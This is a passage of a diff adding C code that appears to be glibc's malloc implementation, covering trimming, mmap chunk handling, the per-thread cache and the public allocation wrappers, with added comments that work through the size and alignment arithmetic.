+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
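+
+/* As a rough illustration of the double fencepost above, assuming a
+   64-bit build (SIZE_SZ == 8, MALLOC_ALIGN_MASK == 0xf): if old_top
+   had old_size == 0x500, it is shrunk to (0x500 - 0x20) & ~0xf == 0x4e0,
+   and two inuse chunks of size 2 * SIZE_SZ == 0x10 are written at
+   offsets 0x4e0 and 0x4f0 from old_top, so later consolidation can
+   never walk past the end of the old region.  */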
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
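+
+/* A worked example of the arithmetic above, assuming a 64-bit build
+   (MINSIZE == 0x20) and pagesize == 0x1000: with a top chunk of
+   0x42000 bytes and pad == 0x20000, top_area == 0x41fdf and
+   extra == ALIGN_DOWN (0x41fdf - 0x20000, 0x1000) == 0x21000, so up
+   to 0x21000 bytes of the top chunk are handed back to the system via
+   MORECORE (-extra).  */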
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
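+
+/* A small example of the combined test above, with pagesize == 0x1000:
+   for block == 0x7f0000021000 and total_size == 0x3000 the bitwise OR
+   is 0x7f0000023000, whose low 12 bits are all zero, so the check
+   passes; if either value were not page aligned, a low bit would
+   survive the (pagesize - 1) mask and malloc_printerr would fire.  */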
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
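+
+/* As a rough illustration, assuming the usual 64-bit parameters
+   (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, TCACHE_MAX_BINS == 64):
+   csize2tidx maps chunk sizes 0x20, 0x30, ..., 0x410 to bins
+   0, 1, ..., 63, and each bin typically holds at most
+   mp_.tcache_count == 7 entries, tracked in counts[] alongside the
+   singly linked lists rooted in entries[].  */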
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that tc_idx is valid and that there is room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that tc_idx is valid and that there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
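+
+/* A small sketch of the resulting behaviour: each bin is a LIFO singly
+   linked list, so after tcache_put (A, i) followed by tcache_put (B, i),
+   the next tcache_get (i) returns B and the one after that returns A,
+   with counts[i] going 1 -> 2 -> 1 -> 0 along the way.  */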
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, so be careful not to pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
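+
+/* A quick check of the unrolled clear above, assuming SIZE_SZ == 8:
+   a request served from a 0x20-byte chunk has csz == 0x20,
+   clearsize == 0x18 and nclears == 3, the minimum the assert expects,
+   while a 0x60-byte chunk gives nclears == 11 > 9 and falls through
+   to memset.  */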
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently would otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
